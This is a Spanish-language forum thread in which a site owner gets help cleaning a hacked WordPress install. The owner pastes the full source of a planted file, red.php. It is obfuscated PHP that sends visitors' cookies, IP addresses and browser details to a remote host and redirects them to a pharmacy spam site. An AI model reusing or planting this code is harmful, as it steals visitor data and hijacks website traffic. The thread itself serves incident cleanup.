Mi Wordpress Hackeado

ka0s · 24 Julio 2014, 23:25 PM

Cita de: #!drvy en 24 Julio 2014, 23:13 PM
Borra el archivo red.php de wp-includes. Es un claro malware.

Sigo analizando por si hay otros.

Saludos

Borrado el archivo red.php.
Sigo aqui a la espera, y ya lo dije mil veces pero lo sigo diciendo igual. GRACIAS!

MinusFour · 24 Julio 2014, 23:47 PM

Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto:

Código [Seleccionar]


Only in wp-includes: red.php
diff -r wp-includes/version.php wp-includes-official/version.php
36,37d35
< 
< $wp_local_package = 'es_ES';

De modo que si no era el red.php no creo que haya algo más.

ka0s · 24 Julio 2014, 23:50 PM

Me he dado cuenta que el archivo red.php ESTÁ EN TODAS LAS CARPETAS.
WP-CONTENT, WP-INCLUDES, PORTADA.

Estas seguro que es Malware?
El contenido es este:

Código [Seleccionar]

<?$tds="http://fbt.yahoo.com/counter.php";$password="fff123106f3430";$g="http://pills-shop.ru";$esdid="counter3";$key="zzzzgb54y45yb45tktbwtberheh6e4wh";?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen('    '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$tt=$tt."&".$key."=".$n;}$tt=urlencode($tt);if(empty($tt)){$tt=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$tt."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y);	while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);}	$w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?>

Perdon que dude, pero me genero esa duda cuando ví que estaba en varias carpetas.
Lo borro de todos lados entonces?

Cita de: MinusFour en 24 Julio 2014, 23:47 PM
Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto:

Código [Seleccionar] Expandir
Only in wp-includes: red.php diff -r wp-includes/version.php wp-includes-official/version.php 36,37d35 < < $wp_local_package = 'es_ES';

De modo que si no era el red.php no creo que haya algo más.

Entonces esto responde a lo que acabo de escribir arriba no?. Borro todos los red.php que vea y pruebo la web?

MinusFour · 25 Julio 2014, 00:00 AM

¿Todos los red.php son iguales? Hasta no verlos todos, no los elimines. Juntalos todos y subelos.

#!drvy · 25 Julio 2014, 00:05 AM

Solo con ver

Código [Seleccionar]

$g="http://pills-shop.ru";

Ya sabes lo que hay xD

Slaudos

ka0s · 25 Julio 2014, 00:17 AM

Gracias a los 2!!
Ya he borrado todo los red.php (todos eran iguales)
Y si entras a la web que pusiste arriba, redirecciona a la de PHARMACY tal como pasaba en la web.

Veré si activo mi web, que sucede ahora. Los mantengo al tanto en mi próxima respuesta!!

EDITO:
Ya he ingresado a la web http://www.wilboradalibros.com.ar/ pero absolutamente TODOS LOS LINKS que clickeo, me llevan a la web de las píldoras

Qué más tendremos que hacer ahora?

MinusFour · 25 Julio 2014, 00:25 AM

A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin.

ka0s · 25 Julio 2014, 00:30 AM

Cita de: MinusFour en 25 Julio 2014, 00:25 AM
A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin.

Actualiza muchas veces, yo matuve apretado F5 2 o 3 segundos y luego me cargó bien la web. Deberías verla. Eso si, los links como dije, siguen redireccionando a la p**a página de pildoras

MinusFour · 25 Julio 2014, 00:44 AM

Todavia no me aparece. Tengo la cache deshabilitada con 0 cookies y como quiera me sigue cargando la pagina de safemedpills si acceso a cualquier otra dirección.

#!drvy · 25 Julio 2014, 00:45 AM

se a mi tambien xD El index ha cambiado pero lo demas no.

Saludos